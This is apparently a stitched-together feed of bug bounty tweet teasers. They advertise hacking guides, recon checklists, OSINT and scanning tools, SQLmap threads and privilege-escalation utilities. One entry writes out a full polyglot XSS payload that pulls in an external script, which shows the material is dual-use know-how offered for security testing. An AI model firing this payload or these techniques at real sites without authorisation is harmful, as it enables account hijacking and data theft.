THEBINARYBOT'S GUIDE TO API HACKING IS AVAILABLE NOW FOR SALE!!!
Learn and find different API-related vulnerabilities such as:
- BOLA
- BOFA
- SSRF
and more...
Use code "thebotswarm" to get the product for just $5. Valid till 6 Mar.
#bugbounty
Before doing a penetration test on a corporation, you must conduct OSINT, or open source intelligence, on the company's in-scope assets.
Here's a list of commonly used OSINT tools below.
🧵👇
#OSINT
#bugbounty
#hacking
#pentesting
☃️Burp Suite for Pentester☃️
This cheatsheet is built for Bug Bounty Hunters and Pentesters to help them find vulnerabilities using "BurpSuite". Learn how to:
➡️Use different extensions
➡️Fuzz with intruder
and much more...
#bugbounty
#cybersecurity
#infosec
#hacking
I re-watched @GodfatherOrwa's talk at @InfoSecComm's IWCON 2.0 and must say it's super informative.
The talk is ~45 minutes long but I have condensed the talk for you to read in 2 minutes.
75% of my Twitter DMs recently have been people asking me "How to get started in Ethical Hacking?"
Although I love to answer everybody personally, I decided to write a thread of resources that would help any newbie level up.
🧵👇
#infosec
#bugbounty
#cybersecurity
The easiest P1/P2 afaik is Sensitive Information.
You can mostly find this on Github. Using the correct dorks would result in quick $$$$.
Here's a list of highly efficient Github dorks that I use on a regular basis.
🧵👇
#bugbounty
#dorks
#github
#bugbountytips
😱 I watched @GodfatherOrwa's insightful talk "The Power of Shodan - Leveraging Shodan for Critical Vulnerabilities" at @NahamSec's #NahamCon2023 and have condensed the ~25 minute talk for you to read in 2 minutes.
Here's some interesting bug bounty tips and tricks ⬇️
🎅 If you're looking to crack OSCP in 2023, feel free to use the link below to download my OSCP Machines List Notion Template.
Practice, tick items off the list, crack OSCP 💻
🔗Link:
#infosec
#notion
#bugbounty
#cybersecurity
💉 SQL Injection is a P1 vulnerability and can easily help you earn $$$$
However, finding/exploiting one manually is tricky. That's where SQLmap helps us.
Here's a list of highly efficient SQLmap commands which you can use to hunt for SQL Injections 🧵👇
API hacking is simple, easier to learn and reproduce.
Down below are massive API hacking resources.
PS: You might definitely want to bookmark this and come.
I got around 10+ messages last week asking me for the tools I use in Bug Bounty.
So I thought why not make a thread on it.
Here's a list of my most used tools.
🧵👇
PS: This is only my personal preference and I always experiment.
#bugbounty
#infosec
#recon
#cybersecurity
Simple recon:
1. Use katana, grab all links.
2. Then use gf and identify patterns on different vulnerabilities like IDOR, SQLi
3. Check source code for .js files and hidden endpoints/params
4. Do Shodan / Google / Bing / Duckduckgo Dorking
5. Naabu on top 1000 ports - each link
ANNOUNCEMENT 🚨
I'm building a bug bounty tools playbook for you all!
This page will be your one-stop location to find the necessary commands to run for any tool of your choice - but for the first iteration I've included only the most prominent tools.
Any other tool you would
I've been following @intigriti's bug bounty tips for quite some time and they're super valuable.
But it's no use if I just store them with me and don't talk about my favourite ones that have worked magic.
So, here's 5 of my recent favourite #bugbountytips from @intigriti
🧵👇
SQL Injection is a P1 critical vulnerability and you will get $$$$ for reporting this.
Learn how to use SQLMap to find your first SQL Injection vulnerability in this thread 👇
New to recon?
Looking for video tutorials to up your recon game?
Checkout the talks below 🧵👇
PS: All of these talks are super informative and well presented. There's no ranking per se. Do check them ALL out.
#bugbounty
#infosec
#cybersecurity
#recon
SqliSniper is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers.
Learn how to use this tool at its fullest to find your first SQL Injection 👇
If you're looking to enter the Cybersecurity space and looking for a job, I highly recommend you check out Stefan Waldvogel's website.
The amount of information present here is huge and very helpful.
🔗Link:
#infosec
#bugbounty
#cybersecurity
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
This payload from @brutelogic is OP!
#bugbountytip
#bugbounty
🕵️♀️ Top 10 Active Directory toolsets used by red teamers and pentesting experts (bookmark to refer later):
1. PowerView: A popular tool for Active Directory reconnaissance, PowerView allows you to extract detailed information about users, groups, permissions, and more.
2.
Chrome Extensions and Firefox addons are gems for us bug bounty hunters if used properly.
Here's a thread of some plugins that I found useful and use on a daily basis.
🧵👇
#bugbounty
#infosec
#cybersecurity
3 ways to succeed at Bug Bounty
1. Hack daily, no matter what (at least 2 hours)
2. Read reports daily
3. Engage with the community
What would you add?
#bugbounty
☃️OWASP API Security 2023 Checklist☃️
In this checklist, read about different scenarios to test APIs for, such as
➡️Broken authentication
➡️Server side request forgery
➡️Improper asset management
and much more...
#bugbounty
#cybersecurity
#infosec
☃️Penetration-Testing-Tools☃️
This massive repo has got almost everything you need such as tools, cheatsheets and scripts on various fields such as
➡️ Web Pentesting
➡️ Red Teaming
➡️ Cloud Assessments
and much more...
☃️ Traitor ☃️
Traitor automates Linux privilege escalation, exploiting misconfigurations and exploits for root shell access, including GTFOBins, writable docker.sock and more!
A super useful tool. Do check it out if you haven't already.
☃️Pentest Cheat Sheets☃️
This brilliant repo contains a lot of one-liner/simple commands that we could use to our benefit when Pentesting. Highly useful if preparing for OSCP as well.
Link:
#bugbounty
#infosec
#hacking
#cybersecurity
#oscp
☃️Bug Bounty Beginner's Roadmap☃️
Many of you have asked me how to get started with bug bounty and what the pre-requisites are to get started.
This repository contains nearly everything you need to know and can help you get started easily with a variety of resources.
#bugbounty
HTTPX is not just used for filtering live hosts. It's a fantastic tool to do more than this.
Here are 7 different ways in which HTTPX can be used in your bug bounty journey 👇
If you could go back in time and start your journey into #bugbounty perfectly, what would you do?
I'll go first.
1. Start with @PortSwigger labs. Practice as I learn.
2. Visit and get my hands dirty.
3. Update myself regularly with @intigriti's bug bytes.
For those who are just starting in Bug Bounty, I politely ask you to read Web Fundamentals and understand how the internet works before testing applications.
Fortunately for you, I have created threads to explain them to the best of my knowledge.
#bugbounty
#infosec
#cybersecurity
One of the biggest mistakes I made in bug bounty was entering the field and trying to replicate what people did without understanding the basics.
If you are a beginner then I urge you to learn some fundamentals on how the internet functions, how web apps work etc.
🧵👇
☃️ DNSTake ☃️
DNSTake is a tool to check missing hosted DNS zones that can lead to subdomain takeover.
If you do not know what DNS takeover is, do read the repo's file where the author has explained it clearly.
☃️ Bug Bounty Reference ☃️
A repository that contains a huge list of bug bounty writeups categorized by the bug nature such as
➡️ SQLi
➡️ XSS
➡️ RCE
and more ...
🔎 A simple recon checklist I follow (not in order)
- Shodan/Google/Bing Dorking
- Check JS files
- Subdomain enumeration
- Wayback URLs
- Content Discovery
- Vhost Scan
- Port Scan
- GitHub Search
What more would you add to the list?
A simple recon checklist I follow
- Check JS files
- Subdomain enumeration
- Wayback URLs
- Fuzzing
- Port Scan
What more would you add to the list?
#bugbounty
#recon
#cybersecurity
I passed eJPT yesterday and some folks out there wanted to know the preparation strategy to pass the exam at first take.
Thus, I decided to write on the resources I used, preparation duration and the overall difficulty in the thread below.
🧵👇
I revisited @Jhaddix's "The Bug Hunter Methodology v4: Recon Edition" and I must say that I learn new things every time I watch the recording.
While I recommend you all to watch the talk, I've also captured short notes which might help you.
Here's my notes summarized:
1.
SSRF bugs, often ignored, can easily earn you more than $1000💸
Check out these top 5 features in a target app to find your first SSRF vulnerability 👇
1️⃣ Webhook Integration:
If your target supports web hook integration feature, then replace the URL with your Burp Collab and
What do I need to know before getting started in Bug Bounty?
This is one of the most frequently asked questions in my DMs, so I figured it would be better to write a thread about it.
Read more below.
🧵👇
#bugbounty
#infosec
#hacking
#cybersecurity
Nuclei is an awesome vulnerability scanning tool developed by @pdiscoveryio that helps to find vulnerabilities automatically based on simple YAML-based templates 🐞💰
Here are 7 ways you can use Nuclei to the fullest 👇